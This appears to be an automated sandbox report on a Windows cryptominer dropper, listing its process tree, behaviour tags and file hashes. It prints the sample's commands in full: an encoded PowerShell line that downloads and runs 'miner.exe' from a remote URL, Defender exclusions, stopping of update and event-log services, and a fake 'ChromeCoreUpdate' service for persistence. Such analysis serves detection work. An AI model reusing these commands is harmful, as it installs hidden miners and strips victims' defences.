- Drops file in System32 directory
PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2916
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3060
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3544
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3632
-
C:\Users\Admin\AppData\Local\Temp\zxc.exe"C:\Users\Admin\AppData\Local\Temp\zxc.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgByAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB2AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwB3AHMAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBCAHkAdABlAHIAQwBvAGQAZQAvAG0AaQBuAGUAcgAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBtAGkAbgBlAHIALgBlAHgAZQAnACwAIAA8ACMAZQBrAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHoAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBxAHUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApACkAPAAjAHgAcgBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAaQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHgAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB4AGQAdwBkAC4AZQB4AGUAJwApADwAIwBkAHYAdAAjAD4A"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Roaming\xdwd.exe"C:\Users\Admin\AppData\Roaming\xdwd.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:240
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:1780
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:4308
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ChromeCoreUpdate"5⤵
- Launches sc.exe
PID:884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ChromeCoreUpdate" binpath= "C:\ProgramData\Updater\Updater32.exe" start= "auto"5⤵
- Launches sc.exe
PID:4632
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:4128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ChromeCoreUpdate"5⤵
- Launches sc.exe
PID:1152 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3204
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4120
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3816
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3860
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3976
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4576
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:4180
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca1⤵PID:2636
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2288
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:544
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:4392
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1232
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3620
-
C:\ProgramData\Updater\Updater32.exeC:\ProgramData\Updater\Updater32.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1812 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1704
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1564
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4748 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4184
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4712 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2012
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4164
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:3540 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4948
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:1784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4372
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:4888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:652
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:4992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3476
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1156
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:2544
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:560
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1972
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5beddacb1b8cdf9b2701ec9ba52fc7a57
SHA142fc5858911200e8615ce0c223d19a3521468773
SHA256839ab90ed4c452c99e6610f0bdc0be6290475e34407e5d3fa9c5fb38b6eeaf0e
SHA512b738727610cccc12e4271974d7cf95cfaf143bc4010e3e3a90fe31ae922630821d46dad255a3ba7044c45cefaca3cb40696a46d55be0e5b3cc0b58cb5abfc04a
-
Filesize
1KB
MD5ed849f4810c49b5507fe22d778826d81
SHA17c27b7ba7253866ff393de956f83bb166cb3b52b
SHA256b80ef6737a39b90e3a82351270b2427f4803946ea16949346736495e2627dd86
SHA512d1455419705b822c7c89325384316243fccc8fc654820f66864e109728222760e9cbfc1fc732c6abb1cf021fcd6e6fca988a769810a9b7acfdb941312fe7f99c
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize290B
MD54b6cdcd7f18c2f5c1772d78bca2f345a
SHA1057aebe7d62b8fc1b9f0a6329665c14e2812d90a
SHA256aac992c2a092a1c2c195169f50d8c11e92f1d95bc0ea1164c8c59bd838152312
SHA512aacad78f263b916053b7d0e941d367ee8f9283c58860d9a56f90272ce3a4df7b26359fd8139f81c718d3b0e6b65f91acb8a9349baad27e05599b8818dc82bd9f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.2MB
MD5adc76054a5b22974290b540fca4adf19
SHA1a39741c3946cda5caae31ca9711cadd64720bbe5
SHA256b036f0b4078be1866cbba1b3a4d1098629668e8ce4bd0167c308f00b7d86adb7
SHA5120369bee44ce5fe7c077af194fd7200e7b413cd807d8c529a69031705ada18572d808e46222aaf557110a86ab65ca437670e5ea3168d8dcac0c4222ae301be631
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD500229ead74fc52d06ed7e3ccff44ecc6
SHA1a8492589b5cf8e8d92c6f3227c742712ca09cc63
SHA2566f60ac405f458595671a7032a65bbe72945b215799dfd474b98e30fc5d24d596
SHA512aeeb423e055a178f6a91bbc68cbbd485323fdcb7dfdc4d3fd4978aa3204a5120f9b6677034f1bcacd3f11008bd631bfdb9497acfb8ba45a910257364c3bf6b01
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD558d6ada6b3b7cd48375faf70a2c3a9e8
SHA1a15b17e4c3e2bf33abe71d0ef1b126637d6b18cf
SHA256aff59d2b1dd3aca45b9d68e85d10d7ab9c91b88e01236032eb05c962a9ebcb4b
SHA512a974569d5c1936384b93d8f50dc5cd392846070fb8d8ee6b02bcc786af603ef1f987c6f502f5667cb543f96568966b23fe849bcc10b1fa79ea641c5f7cc815c8
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A
Filesize412B
MD57a07ea8c0fc2d09152640c412e372d83
SHA1c5da67e5ee63b613fbd346f570759d524dac6265
SHA256dddd0fee798fdc21c228efbd9c74dbae640dc0c0255c903355147134efbc54f5
SHA5126294455b9121c73b76fef8a5e7feec2e8e74388da872095a22f4e4fa6cf3ca7fabf41855bd649f179571053ff7bcffd1fcd799dd1e8f1fbd0096468ef0e82700